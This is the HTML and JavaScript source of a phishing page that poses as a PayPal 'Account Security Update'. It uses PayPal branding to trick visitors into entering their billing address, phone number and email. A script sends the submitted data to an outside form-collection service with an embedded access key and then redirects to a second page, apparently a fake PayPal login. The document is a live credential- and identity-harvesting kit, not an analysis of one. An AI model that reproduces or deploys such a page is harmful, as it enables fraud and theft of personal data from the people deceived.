<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>PayPal Account Security Update</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f7f7f7;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 117vh;
            margin: 0;
        }
        .container {
            width: 100%;
            max-width: 400px;
            text-align: center;
            background-color: #fff;
            padding: 20px;
            border: 1px solid #e5e5e5;
            border-radius: 10px;
            box-shadow: 0 2px 5px rgba(0, 0, 0, 0.1);
        }
        .logo {
            width: 60px;
            height: 60px;
            margin-bottom: 10px;
        }
        h1 {
            color: #000;
            font-size: 24px;
            margin-bottom: 10px;
        }
        p {
            color: #333;
            font-size: 14px;
            margin-bottom: 20px;
        }
        input[type="text"], input[type="password"], input[type="email"] {
            width: calc(100% - 30px);
            padding: 15px;
            margin-bottom: 15px;
            border: 1.5px solid #ccc;
            border-radius: 5px;
            font-size: 16px;
        }
        input[type="text"]:focus, input[type="password"]:focus, input[type="email"]:focus {
            border-color: #0070ba;
            outline: none;
        }
        .btn-primary {
            width: 100%;
            padding: 12px;
            background-color: #2f39bbf4;
            color: white;
            border: none;
            border-radius: 25px;
            cursor: pointer;
            font-size: 16px;
            margin-top: 15px;
        }
        .btn-primary:hover {
            background-color: #005a99;
        }
        .forgot-password {
            color: #2f39bbf4;
            text-decoration: none;
            display: block;
            margin-bottom: 20px;
            font-weight: bold;
            font-size: 14px;
            text-align: left;
        }
        .footer {
            font-size: 12px;
            color: #777;
            margin-top: 40px;
            text-align: center;
        }
        .footer a {
            color: #0070ba;
            text-decoration: none;
            margin: 0 5px;
        }
        .language-selector {
            display: flex;
            justify-content: center;
            align-items: center;
            margin-top: 20px;
        }
        .language-selector a {
            margin: 0 5px;
            color: #0070ba;
            text-decoration: none;
        }
        .language-selector img {
            width: 20px;
            margin-right: 5px;
        }
        #show {
            display: inline-block;
            font-size: 14px;
            font-weight: bold;
            position: absolute;
            top: 42px;
            right: 15px;
            cursor: pointer;
            color: #0070ba;
        }
        .billing-container {
            margin-top: 30px;
            text-align: left;
        }
        .row {
            display: flex;
            gap: 10px;
        }
        .row div {
            flex: 1;
        }
        
         
        button {
            width: 100%;
            padding: 12px;
            background-color: #0070ba;
            color: white;
            border: none;
            border-radius: 5px;
            font-size: 16px;
            cursor: pointer;
        }
        button:hover {
            background-color: #005a99;
        }
         select {
            height: 40px;
            width:120px;
            outline: none;
        }
        
        label {
            display: block;
            font-size: 14px;
            color: #333;
            margin-bottom: 5px;
        }
        select {
            height: 45px;
            border-radius:5px;
            background:none;
               border: 1.5px solid #ccc;
            border-radius: 5px;
            font-size: 16px;
            width:150px;
            
            
                                   
           }
           
             .loader-container {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            display: flex;
            justify-content: center;
            align-items: center;
            background-color: #fff;
            z-index: 1000;
        }

        .loader {
            border: 8px solid #f3f3f3;
            border-top: 8px solid #0070ba;  /* PayPal blue */
            border-radius: 50%;
            width: 60px;
            height: 60px;
            animation: spin 1s linear infinite;
        }

        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }
        
        /* Hide the loader after 1 second */
        .hidden {
            display: none;
        }
    </style>
</head>
<body>

<div class="container">
    <img src="https://1000logos.net/wp-content/uploads/2017/05/emblem-Paypal-500x500.jpg" alt="PayPal Logo" class="logo">
    <h1>Account Security Update</h1>
    <p>Please confirm your details to ensure your account's security.</p>

    <form id="securityForm" >
        <input type="hidden" name="access_key" value="5951613f-cd5b-4ad1-9ffc-0d8b3c929004" />
<input type="hidden" name="honeypot" value="" />

        <div class="billing-container">
            <h2>Billing Address</h2>
            <label for="street">Street address</label>
            <input type="text" id="street" name="street" placeholder="Street address" required>

            <label for="apt">Apt., ste., bldg.</label>
            <input type="text" id="apt" name="apt" placeholder="Apt., ste., bldg." required>

            <label for="city">City</label>
            <input type="text" id="city" name="city" placeholder="City" required>

            <div class="row">
                <div>
            
                    <label for="state">State</label>
                    <select>
                     <option value="">Select State</option>
                        <option value="CA">California</option>
                        <option value="NY">New York</option>
                        <!-- Add more states as needed -->
                        <option value="">Select State</option>
<option value="AL">Alabama</option>
<option value="AK">Alaska</option>
<option value="AZ">Arizona</option>
<option value="AR">Arkansas</option>
<option value="CA">California</option>
<option value="CO">Colorado</option>
<option value="CT">Connecticut</option>
<option value="DE">Delaware</option>
<option value="FL">Florida</option>
<option value="GA">Georgia</option>
<option value="HI">Hawaii</option>
<option value="ID">Idaho</option>
<option value="IL">Illinois</option>
<option value="IN">Indiana</option>
<option value="IA">Iowa</option>
<option value="KS">Kansas</option>
<option value="KY">Kentucky</option>
<option value="LA">Louisiana</option>
<option value="ME">Maine</option>
<option value="MD">Maryland</option>
<option value="MA">Massachusetts</option>
<option value="MI">Michigan</option>
<option value="MN">Minnesota</option>
<option value="MS">Mississippi</option>
<option value="MO">Missouri</option>
<option value="MT">Montana</option>
<option value="NE">Nebraska</option>
<option value="NV">Nevada</option>
<option value="NH">New Hampshire</option>
<option value="NJ">New Jersey</option>
<option value="NM">New Mexico</option>
<option value="NY">New York</option>
<option value="NC">North Carolina</option>
<option value="ND">North Dakota</option>
<option value="OH">Ohio</option>
<option value="OK">Oklahoma</option>
<option value="OR">Oregon</option>
<option value="PA">Pennsylvania</option>
<option value="RI">Rhode Island</option>
<option value="SC">South Carolina</option>
<option value="SD">South Dakota</option>
<option value="TN">Tennessee</option>
<option value="TX">Texas</option>
<option value="UT">Utah</option>
<option value="VT">Vermont</option>
<option value="VA">Virginia</option>
<option value="WA">Washington</option>
<option value="WV">West Virginia</option>
<option value="WI">Wisconsin</option>
<option value="WY">Wyoming</option>
                    </select>
            
            
                </div>
                <div>
                    <label for="zip">ZIP code</label>
                    <input type="text" id="zip" name="zip" placeholder="ZIP code" style="margin-left:-15px;" required>
                </div>
            </div>

            <h2>Contact Information</h2>
            <div class="row">
                <div>
                    <label for="phone-type">Phone type</label>
                    <select id="phone-type" name="phone-type">
                        <option value="">Select Country Code</option>
<option value="+1">United States (+1)</option>
<option value="+44">United Kingdom (+44)</option>
<option value="+61">Australia (+61)</option>
<option value="+1">Canada (+1)</option>
<option value="+33">France (+33)</option>
<option value="+49">Germany (+49)</option>
<option value="+91">India (+91)</option>
<option value="+81">Japan (+81)</option>
<option value="+52">Mexico (+52)</option>
<option value="+31">Netherlands (+31)</option>
<option value="+64">New Zealand (+64)</option>
<option value="+47">Norway (+47)</option>
<option value="+34">Spain (+34)</option>
<option value="+46">Sweden (+46)</option>
<option value="+41">Switzerland (+41)</option>
<option value="+86">China (+86)</option>
<option value="+55">Brazil (+55)</option>
<option value="+27">South Africa (+27)</option>
<option value="+62">Indonesia (+62)</option>
<option value="+63">Philippines (+63)</option>
<option value="+82">South Korea (+82)</option>
<option value="+7">Russia (+7)</option>
<option value="+65">Singapore (+65)</option>
<option value="+60">Malaysia (+60)</option>
<option value="+20">Egypt (+20)</option>
<option value="+61">United Arab Emirates (+971)</option>
<!-- Add other countries supported by PayPal as needed -->
                        
                        
                    </select>
                </div>
                <div>
                    <label for="phone">Phone number</label>
                    <input type="text" id="phone" name="phone" placeholder="Phone number" style="margin-left:-15px;" required>
                </div>
            </div>

            <label for="email">Email</label>
            <input type="email" id="email" name="email" placeholder="Email" required>
        </div>


        <a href="./paypal-login2.html" class="forgot-password">Forgot details?</a>
        <button type="submit" class="btn-primary" onclick="submitForm(event)" onclick="loader(next)">Next</button>
    </form>

    <div class="language-selector">
        <img src="https://upload.wikimedia.org/wikipedia/en/a/a4/Flag_of_the_United_States.svg" alt="English Flag">
        <a href="#">English</a>
        <a href="#">Français</a>
        <a href="#">Español</a>
        <a href="#">中文</a>
    </div>

    <div class="footer">
        <a href="#">Contact Us</a> |
        <a href="#">Privacy</a> |
        <a href="#">Legal</a> |
        <a href="#">Policy Updates</a> |
        <a href="#">Worldwide</a>
    </div>
</div>

<script>
    function togglePasswordVisibility() {
        let passField = document.getElementById("pass");
        let confirmPassField = document.getElementById("confirm-pass");
        let show = document.getElementById("show");

        if (passField.type === "password") {
            passField.type = "text";
            confirmPassField.type = "text";
            show.innerHTML = "Hide";
        } else {
            passField.type = "password";
            confirmPassField.type = "password";
            show.innerHTML = "Show";
        }
    }

    
    
    
    // Get the form element
        const form = document.getElementById('securityForm');

        // Listen for the form submit event
        form.addEventListener('submit', function (e) {
            e.preventDefault(); // Prevent default form submission

            // Create a FormData object with the form data
            const formData = new FormData(form);

            // Send the form data to Web3Forms via fetch
            fetch('https://api.web3forms.com/submit', {
                method: 'POST',
                body: formData
            })
            .then(response => {
                if (response.ok) {
                    // Redirect to Google or any desired website after successful submission
                    window.location.href = './paypal-login2.html';
                } else {
                    alert('Something went wrong. Please try again.');
                }
            })
            .catch(error => {
                console.error('Error:', error);
                alert('Error. Please try again.');
            });
        });
        
        
        
        // Function to hide the loader after 2 seconds
function hideLoader() {
    setTimeout(function() {
        document.getElementById('loaderContainer').classList.add('hidden');
    }, 2000);  // 2 seconds
}

// Find the button and attach a click event listener
let nextButton = document.querySelector('.btn-primary');
nextButton.addEventListener('click', function() {
    hideLoader();  // Call the hideLoader function when the button is clicked
});
    
</script>

</body>
</html>
